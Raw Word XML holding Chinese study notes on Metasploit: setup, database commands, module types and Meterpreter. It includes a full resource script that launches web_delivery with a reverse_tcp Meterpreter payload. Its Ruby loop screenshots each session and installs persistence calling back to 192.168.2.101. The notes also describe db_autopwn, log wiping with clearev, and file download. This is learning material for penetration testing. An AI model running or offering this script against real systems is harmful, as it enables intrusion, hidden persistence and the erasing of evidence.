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93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三个版本：pro、community、framework。安装Metasploit的时候，可能杀毒软件会干扰，最好退出安装。</w:t>
      </w:r>
      <w:r w:rsidR="00EA7B09">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pro版本提供了更好的免杀算法以及</w:t>
      </w:r>
      <w:r w:rsidR="009861E0">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>措施。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Armitage程序自动化了使用Metasploit的过程。armitage中在shell中输入命令与msf中的界面有点偏差。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用户名：security  密码为空</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRPr="005D5318" w:rsidRDefault="00AC3366" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC3366">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7611110" cy="5708332"/>
            <wp:effectExtent l="0" t="953" r="7938" b="7937"/>
            <wp:docPr id="1" name="图片 1" descr="D:\TencentRecord\641370196\FileRecv\MobileFile\IMG_20170429_16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ncentRecord\641370196\FileRecv\MobileFile\IMG_20170429_165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14003" cy="571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lastRenderedPageBreak/>
        <w:t>需要PostgreSQL、Ruby运行环境(sqlite包)....</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71B93" w:rsidRDefault="00B71B93" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B0B4A" w:rsidRDefault="00B71B93" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>首先我认为msf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>我不喜欢拿msf来做nmap应做的事情</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00006664">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是如果没有安装nmap这种狗血事情，是你活该。</w:t>
      </w:r>
      <w:r w:rsidR="00361DD3">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就不应该用于扫描与爆破。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00165BF6" w:rsidRPr="00165BF6" w:rsidRDefault="00165BF6" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D04AC6">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msfconsole可以通过定时任务启动运行，从而执行后台任务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE0905" w:rsidRDefault="00DE0905" w:rsidP="00DE0905">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向目录中加入模块以后需要重新开启msfconsole才能对模块进行使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D04AC6" w:rsidRDefault="00D04AC6" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B22CE0" w:rsidRDefault="00B22CE0" w:rsidP="00B22CE0">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidR="00D4044B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
        </w:rPr>
        <w:t>msf_begin_normal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lit"/>
        </w:rPr>
        <w:t>.rc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t>use exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t>set target 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00104245" w:rsidRDefault="00104245" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00104245">
        <w:t>set payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B2DA5" w:rsidRDefault="005B2DA5" w:rsidP="00C7753A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B2DA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x86</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2DA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2DA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2DA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是可以迁移到</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2DA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x86_64</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2DA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5323" w:rsidRPr="00C7753A" w:rsidRDefault="00AC5323" w:rsidP="00C7753A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007257FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="237E483D" wp14:editId="092A2D74">
            <wp:extent cx="4371429" cy="358095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3A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t>set lhost 192.168.2.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t>set lport 6666</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t>set uripath /</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t>set ExitOnSession false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t>exploit -j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t>&lt;ruby&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">    sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">    print_status("Waiting on an incoming sessions...")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">    while (true)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">        framework.sessions.each_pair do |sid,s|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">            thost = s.tunnel_peer.split(":")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">            # Ensure that stdapi has been loaded before running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if s.ext.aliases['stdapi']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                print_status("run screenshot to session #{sid} #{thost}...")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                s.console.run_single("screenshot")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                print_status("Executing persistent command...")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                s.console.run_single("run persistence -r 192.168.2.101 -p 5556 -U -i 30")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                sleep(4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                print_status("Closing session #{sid} #{thost}...")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                s.kill</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                print_status("Waiting on an incoming sessions...")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                print_status("Session #{sid} #{thost} active, but not yet configured")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">                sleep(15)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">            end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A"/>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">        end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">        sleep(4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">    end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A"/>
    <w:p w:rsidR="00C7753A" w:rsidRPr="00C7753A" w:rsidRDefault="00C7753A" w:rsidP="00C7753A">
      <w:r w:rsidRPr="00C7753A">
        <w:t xml:space="preserve">    print_status("All done")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B22CE0" w:rsidRDefault="00C7753A" w:rsidP="00525243">
      <w:r w:rsidRPr="00C7753A">
        <w:t>&lt;/ruby&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6350" w:rsidRPr="00525243" w:rsidRDefault="00AE6350" w:rsidP="00525243"/>
    <w:p w:rsid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如果没有开启Postgresql服务就会导致search进行的还是slow search。真正的解决办法是开启postgresql服务，然后重新开启msfconsole（不过估计db_rebuild_cache就可以了）。systemctl start postgresql或者service postgresql start </w:t>
      </w:r>
      <w:r w:rsidR="00220A61">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。从前好像还有个</w:t>
      </w:r>
      <w:r w:rsidR="00220A61" w:rsidRPr="00FC1F0E">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>service metasploit restart</w:t>
      </w:r>
      <w:r w:rsidR="00220A61">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00220A61">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>但是现在已经没有了</w:t>
      </w:r>
      <w:r w:rsidR="00220A61">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。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工作空间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workspace -h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数据库操作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db_connect  与其他数据库进行交互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db_status   检查是否已经建立连接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db_nmap    使用nmap进行扫描并且结果保存到数据库之中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db_import  向连接数据库中导入其他扫描工具的扫描结果（OpenVas、Nessus、nmap等）xml等格式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db_rebuild_cache 重新建立缓存，使用新配置来代替过时的配置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db_disconnect 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db_export   导出连接数据库中的内容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类似于recon-ng可以使用services与hosts来查看当期数据库中的记录。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db_export -f xml /home/username/xxxx.html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db_autopwn脚本要自己从github上下载，然后放到plugins/并load db_autopwn来加载这个rb脚本，它会自动调用模块对msf的当前工作区数据库中所有主机发动攻击。db_autopwn -p -e #-p是指要求模块与端口匹配 -e是指开始发起攻击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resource  xxx.rc  xxx.rc是自己写的脚本放在scripts/resource/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sf &gt; db_status #怎么给我返回虚假信息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[*] postgresql connected to msf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sf &gt; search sock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[!] Module database cache not built yet, using slow search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^C[-] Error while running command search: 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msf &gt; db_rebuild_cache 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[-] The database is not connected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msf &gt; db_connect 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[-] postgresql already connected to msf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[-] Run db_disconnect first if you wish to connect to a different database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msf &gt; db_disconnect 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sf &gt; db_connect #还是没有解决search问题，看来只能开postgres服务以后重开msf了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etasploit的攻击就是ruby脚本化的攻击，所以可以批量可以一键执行。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Exploit模块：是利用安全漏洞进行攻击（比如说缓冲区溢出攻击，将payload.encode加到字符串的ShellCode的位置）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A1FFC" w:rsidRPr="006A1FFC" w:rsidRDefault="005D5318" w:rsidP="006A1FFC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Payload模块：在完成一次渗透攻击以后在目标系统上运行，帮助我们获得访问和行动权限</w:t>
      </w:r>
      <w:r w:rsidR="006A1FFC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。但是</w:t>
      </w:r>
      <w:r w:rsidR="006A1FFC">
        <w:t>msf没有办法同时设置多个PAYLOAD</w:t>
      </w:r>
      <w:r w:rsidR="00FE7342">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006A1FFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>一次只能选择一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRPr="006A1FFC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据说Metasploit的一项能力就会将攻击程序与攻击载荷进行混合与匹配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Auxiliary模块：提供辅助支持，比如说信息搜集（扫描、fuzz测试漏洞挖掘、数据库特征识别）、网络协议欺骗等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Encoder模块：进行对攻击向量exploit与攻击载荷payload的混淆帮助让过杀毒软件和WAF。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NOP模块： 提高payload的可靠性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支持reset来清空屏幕，那是因为msf其实还集成了本机的shell，所以支持所有的shell命令。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sfdb init 建立数据库缓存(这条命令在你开了数据库以后search还是slow search时使用)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sfupdate跟新版本，kali自带里面的漏洞利用脚本太少了，然后跟新了好久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search ms08-67 #ms08-67来自Nessus扫描结果(show exploit)。search会查找各个模块的信息.search apple ssh就会查找包含apple或者ssh的信息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info exploit/Windows/smb/ms_08xxxxx 查看模块的详细信息，不指定好整个路径及就会找不到。use以后可以直接info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use exploit/Windows/smb/ms_08xxxxx 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show payloads #漏洞攻击程序可能有多个攻击载荷，查看帮助手册了解每一个攻击载荷的详细信息 #use 了渗透模块以后只会看到支持的payload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set payload Windows/meterpreter/reverse_tcp #在use了指定exploit模块以后，set payload 在TabTab就可以知道能用的只有哪些，比如有些对unix系统攻击的模块就不会出</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>现windows的Meterpreter。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show options（show advanced） #不知道配置哪些options的话你run一下就知道了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set RHOST xxxx #小写的rhost亦可，Metasploit中大小写无所谓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set LHOST xxxx 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补充说明：EXITFUNC 用于指定在发生故障、崩溃或正常退出时进程是如何终止的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007869DE" w:rsidRDefault="007869DE" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>set payload后的一些参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:t>reverse_https</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007869DE" w:rsidRDefault="007869DE" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidRPr="007869DE">
        <w:t>SessionCommunicationTimeout 0  于是session永远也不会timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>从而在HTTPS结束以后还保持着连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007869DE" w:rsidRDefault="007869DE" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>set ExitOnSession false 这个配合exploit的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-j参数使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007869DE" w:rsidRPr="005D5318" w:rsidRDefault="007869DE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run启动辅助模块，exploit启动渗透攻击模块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back 回退到上一级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exploit #如果上面攻击载荷使用了vnc的方向连接那么这条命令执行后就会自动弹出一个桌面控制。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sessions 列出当前可以使用的会话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check 检查某个特定目标是否容易受到攻击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sessions -i 查看已有sessions，并且显示它们的id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="00D401DB" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>sessions Number</w:t>
      </w:r>
      <w:r w:rsidR="00AB7DFB">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（不过有时候见到的是sessions</w:t>
      </w:r>
      <w:r w:rsidR="00AB7DFB">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> –i Number</w:t>
      </w:r>
      <w:r w:rsidR="00AB7DFB">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D401DB" w:rsidRPr="005D5318" w:rsidRDefault="00D401DB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如果你仅仅使用了exploit模块，那么在exploit执行以后就得到了一个ssh等的连接了，msf似乎会自动帮你选一个payload。要退出的话目前我只知道C-c然后放弃当前session。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eterpreter也加Meta-Interpreter，在目标为攻击者提供特殊shell来进行交互，特点是完全运行在内存之中</w:t>
      </w:r>
      <w:r w:rsidR="00C15709">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，趋向完全</w:t>
      </w:r>
      <w:r w:rsidR="00D54BD7">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇编</w:t>
      </w:r>
      <w:r w:rsidR="00C15709">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>化</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。“脚本”运行时的权限与被攻击程序的权限有关。如果使用传统的cmd或者shell都会启动新的进程容易被发现，Meterpreter却是可以绑定到其他进程中来隐藏自己（只要这个行为不会被行为检测发现的话），而且cmd和bash都没有Meterpreter功能丰富。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113EC4" w:rsidRPr="002531ED" w:rsidRDefault="00113EC4" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002531ED">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>传闻可以编写自己的共享对象作为meterpreter的扩展</w:t>
      </w:r>
      <w:r w:rsidRPr="002531ED">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。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命令支持有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clearev 清楚目标机器应用程序、系统和安全日志中的所有报告时间（也可以调用模块来清除run event_manager -c，-c制定了删除所有类型的日志，应用程序、系统和安全三种类型）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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download/upload source__file destination_file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00517113" w:rsidRPr="005D5318" w:rsidRDefault="00517113" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:tab/>
        <w:t>download source_file 就会将文件保存到根目录下方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如果要保存一个盘或者一个文件夹等文件集合的内容需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-r 这个递归参数。</w:t>
      </w:r>
      <w:r w:rsidR="00081FF5">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而且对于windows的盘符似乎使用\\两个反斜杠。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
